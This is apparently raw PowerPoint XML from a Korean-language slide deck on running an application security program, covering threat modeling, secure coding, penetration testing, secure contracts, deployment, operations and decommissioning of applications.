              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t>구현</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t> 및 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId10"/>
            </a:rPr>
            <a:t>검증</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t> 활동을 통합하고 정의합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0"/>
            <a:t>. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>활동들은 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId11"/>
            </a:rPr>
            <a:t>위협 모델링</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>안전한 설계 및 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId12"/>
            </a:rPr>
            <a:t>검토</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0" err="1"/>
            <a:t>시큐어</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t> 코딩 및 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId13"/>
            </a:rPr>
            <a:t>코드 리뷰</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId14"/>
            </a:rPr>
            <a:t>침투 테스트</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>그리고 교정입니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="8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성공하기 위해 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId15"/>
            </a:rPr>
            <a:t>개발 및 프로젝트 팀을</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId15"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId15"/>
            </a:rPr>
            <a:t>위한 서비스들</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>을 지원하고 주제별 전문가를 제공합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2033070" y="3855072"/>
        <a:ext cx="5513810" cy="845537"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094177" y="3692202"/>
          <a:ext cx="938893" cy="11712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/>
            <a:t>기존 프로세스와 보안 통합</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1140010" y="3738035"/>
        <a:ext cx="847227" cy="1079611"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4325721" y="2727906"/>
          <a:ext cx="974249" cy="5559552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측정기준으로 관리합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0"/>
            <a:t>. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>측정기준 및 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0" err="1"/>
            <a:t>캡처</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t> 된 분석 데이터를 기반으로 개선을 하고</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>자금 지원 결정을 받는다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0"/>
            <a:t>. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>측정기준에는 유형 및 사례 개수에 따라 보안 사례</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0"/>
            <a:t>/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>활동</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>발견된 취약점</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>완화된 취약점</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>애플리케이션 범위</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>결함 빈도를 포함합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="8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 기업 전체에 전략 및 체계적인 개선을 위해 근본 원인과 취약점 패턴을 찾기 위한 구현 및 검증 활동으로부터 데이터를 분석합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="8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800" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
            <a:t>실수로부터 학습하고 개선을 촉진하는 긍정적 인센티브를 제공합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="1200" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2033070" y="5068117"/>
        <a:ext cx="5511993" cy="879131"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094177" y="4922043"/>
          <a:ext cx="938893" cy="11712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/>
            <a:t>관리적 가시성 제공</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1140010" y="4967876"/>
        <a:ext cx="847227" cy="1079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3559351" y="-2227576"/>
          <a:ext cx="855279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</a:rPr>
            <a:t>애플리케이션의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모든 데이터 자산의 기밀성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인증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noProof="0" dirty="0" err="1">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>무결성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및 가용성과 관련된 비즈니스 요구사항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예상되는 비즈니스 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="1200" noProof="0" dirty="0" err="1">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>로직을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수집하고 협상합니다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기능적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비기능적 보안 요구사항을 포함한 기술적 요구사항을 수집합니다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AU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보안 활동을 포함하여 설계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구축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테스트 및 운영의 모든 측면을 다루는 예산을 계획하고 협상합니다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AU" sz="900" kern="120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13588" y="101689"/>
        <a:ext cx="5346805" cy="771777"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="1761"/>
          <a:ext cx="1115983" cy="971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요구사항 및 리소스 관리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203285" y="49192"/>
        <a:ext cx="1021121" cy="876770"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29555282-7DBF-4954-82C2-561252AD070F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3469548" y="-1103740"/>
          <a:ext cx="1034887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보안 프로그램과 관련된 가이드 라인 및 보안 요구사항을 포함하여 내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외부 개발자와 요구사항을 협상합니다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.(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: SDLC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모범사례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계획 및 설계 단계를 포함한 모든 기술적 요구사항의 이행을 평가합니다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디자인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보안 및 서비스 수준 계약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(SLA)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을 포함한 모든 기술적 요구사항을 협상합니다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OWASP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안전한 소프트웨어 계약 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="1200" noProof="0" dirty="0" err="1">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>부록</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="1200" noProof="0" dirty="0" err="1">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>와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같은 템플릿과 체크리스트를 채택하십시오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참고 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부록은 미국 계약법을 위한 것으로 부록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샘플을 사용하기 전에 자격이 검증된 법률 자문을 구하십시오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22357" y="1144489"/>
        <a:ext cx="5329269" cy="933849"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="1032193"/>
          <a:ext cx="1115983" cy="11584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제안 요청</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR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(RFP) </a:t>
          </a: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및 계약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210332" y="1086671"/>
        <a:ext cx="1007027" cy="1049483"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3507052" y="114105"/>
          <a:ext cx="959877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개발자와 내부 주주와 계획 및 디자인을 협상합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="900" kern="1200" noProof="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예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보안 전문가</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" strike="sngStrike" kern="1200" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill>
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea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보호 요구사항 및 예상 위협 수준에 적합한 보안 아키텍처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통제 및 대응책을 정의합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="900" kern="1200" noProof="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이러한 절차는 보안 전문가의 지원을 받아야 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>
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t>애플리케이션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소유자가 남은 위험을 수용하거나 추가 리소스를 제공하는지 확인합니다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noProof="0" dirty="0" err="1">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>비기능</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> 요구사항에 대해 추가된 제약 조건을 포함하여 보안 사례를 생성합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="900" kern="1200" noProof="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18694" y="2396177"/>
        <a:ext cx="5336593" cy="866163"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="2249433"/>
          <a:ext cx="1115983" cy="11596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계획 및 디자인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210332" y="2303911"/>
        <a:ext cx="1007027" cy="1050694"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{992D08B6-B207-435B-A893-D17B49418ACB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3301853" y="1466642"/>
          <a:ext cx="1362792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필요한 인증을 비롯하여 응용 프로그램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인터페이스 및 모든 필수 구성 요소의 안전한 배포를 자동화합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US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기술적 기능 및 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IT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아키텍처와 통합을 테스트하고 비즈니스 면의 테스트를 조정합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU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de-DE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기술 및 비즈니스 관점에서 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“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사용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”, “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악용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”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의 테스트 케이스를 작성합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU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응용프로그램에서 내부 프로세스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보호 요구 사항 및 추측된 위협 수준에 따라 보안 테스트를 관리합니다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</a:rPr>
            <a:t>애플리케이션을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작동시키고 필요한 경우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이전에 사용한 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t>애플리케이션에서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참고합니다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변경 관리 데이터베이스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(CMDB)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및 보안 아키텍처를 포함한 모든 문서를 완성합니다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37273" y="3564274"/>
        <a:ext cx="5291952" cy="1229740"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="3467883"/>
          <a:ext cx="1114893" cy="14225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테스트 및 배포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210279" y="3522308"/>
        <a:ext cx="1006043" cy="1313671"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0BBDD660-3A49-4256-9C52-69675972DDC1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3479208" y="2832099"/>
          <a:ext cx="1008083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작업 간 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t>애플리케이션의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보안 관리 지침이 포함되어야 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.(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패치 관리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)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" strike="sngStrike" kern="1200" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill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사용자의 보안 인식을 높이고 보안과 가용성 간의 충돌을 관리합니다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변경 사항을 계획하고 관리합니다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예 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: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t>애플리케이션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또는 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OS, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="1200" dirty="0" err="1">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>미들웨어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및 라이브러리와 같은 다른 구성 요소의 새 버전으로 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="1200" dirty="0" err="1">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>마이그레이션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CMDB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및 보안 아키텍처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,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제어 및 대응책을 포함한 모든 실행 책자 또는 프로젝트 문서를 업데이트 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19959" y="5089770"/>
        <a:ext cx="5326582" cy="909661"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="4949205"/>
          <a:ext cx="1114893" cy="119079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운영 및 변경 관리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210279" y="5003630"/>
        <a:ext cx="1006043" cy="1081941"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3694906" y="3848749"/>
          <a:ext cx="584169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필요한 데이터를 보관하고 그 이외의 것은 안전하게 삭제합니다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noProof="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미사용 계정 및 권한을 포함한 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t>애플리케이션은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안전하게 폐기합니다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>
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>CMDB 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상에서 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t>애플리케이션의</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> 상태를 폐기로 설정합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
            <a:latin typeface="+mn-ea"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1300354" y="6300335"/>
        <a:ext cx="5373273" cy="527135"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{50CC931A-2802-4A28-B17D-4CFEC4144601}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="6198796"/>
          <a:ext cx="1115983" cy="7302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noProof="0" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>폐기 시스템</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" kern="1200" noProof="0" dirty="0">
            <a:latin typeface="+mj-ea"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="191500" y="6234442"/>
        <a:ext cx="1044691" cy="65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1254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r">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{46C0059F-706E-42AF-B504-DA4BA04161AF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1254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r">
              <a:defRPr sz="13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4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r">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{6C875393-9CE0-40DD-A78A-34757A3496C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681038"/>
            <a:ext cx="2546350" cy="3398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898" tIns="53949" rIns="107898" bIns="539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1" y="4307206"/>
            <a:ext cx="5425440" cy="4080510"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="107898" tIns="53949" rIns="107898" bIns="53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4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r">
              <a:defRPr sz="14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3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20725"/>
            <a:ext cx="2698750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wrap="square" lIns="115650" tIns="57800" rIns="115650" bIns="57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4143591" y="9119476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wrap="square" lIns="115650" tIns="57800" rIns="115650" bIns="57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77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9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6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7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88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1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7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4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20725"/>
            <a:ext cx="2698750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wrap="square" lIns="115150" tIns="57575" rIns="115150" bIns="57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143590" y="9119476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wrap="square" lIns="115150" tIns="57575" rIns="115150" bIns="57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4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20725"/>
            <a:ext cx="2698750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wrap="square" lIns="115150" tIns="57575" rIns="115150" bIns="57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4143590" y="9119476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wrap="square" lIns="115150" tIns="57575" rIns="115150" bIns="57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74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865716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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{3201FDD2-27F9-4966-B34E-DF3AF7EF07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4264512"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957457"/>
          <a:ext cx="6836400" cy="210220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03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44000"/>
            <a:ext cx="6071752" cy="3882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474720" y="6400800"/>
            <a:ext cx="3383280" cy="274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>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="40005" dist="22860" dir="5400000" algn="ctr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lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr sz="44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371600" y="76199"/>
            <a:ext cx="5486400" cy="762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7142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Exo 2"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="47" name="Shape 47"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="957457"/>
          <a:ext cx="6861600" cy="210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-6350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App. Specific</a:t>
                      </a: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350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 ?</a:t>
                      </a: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Shape 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6400800"/>
            <a:ext cx="3383280" cy="274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3168000"/>
            <a:ext cx="3383280" cy="315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3474720" y="3168000"/>
            <a:ext cx="3383280" cy="315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rgbClr val="83276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1">
                <a:solidFill>
                  <a:srgbClr val="4A164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>
              <a:solidFill>
                <a:srgbClr val="4A16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24248" y="1058047"/>
            <a:ext cx="6071752" cy="390006"/>
            <a:chOff x="24248" y="1058047"/>
            <a:chExt cx="6071752" cy="390006"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="53" name="Shape 53"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="24248" y="1058047"/>
              <a:ext cx="6071752" cy="386519"/>
              <a:chOff x="24248" y="1070390"/>
              <a:chExt cx="6071752" cy="386519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5486400" y="1070390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Impacts</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="55" name="Shape 55"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr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56" name="Shape 56"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr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endParaRPr sz="900" b="1">
                    <a:solidFill>
                      <a:schemeClr val="dk1"/>
                    </a:solidFill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cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="57" name="Shape 57"/>
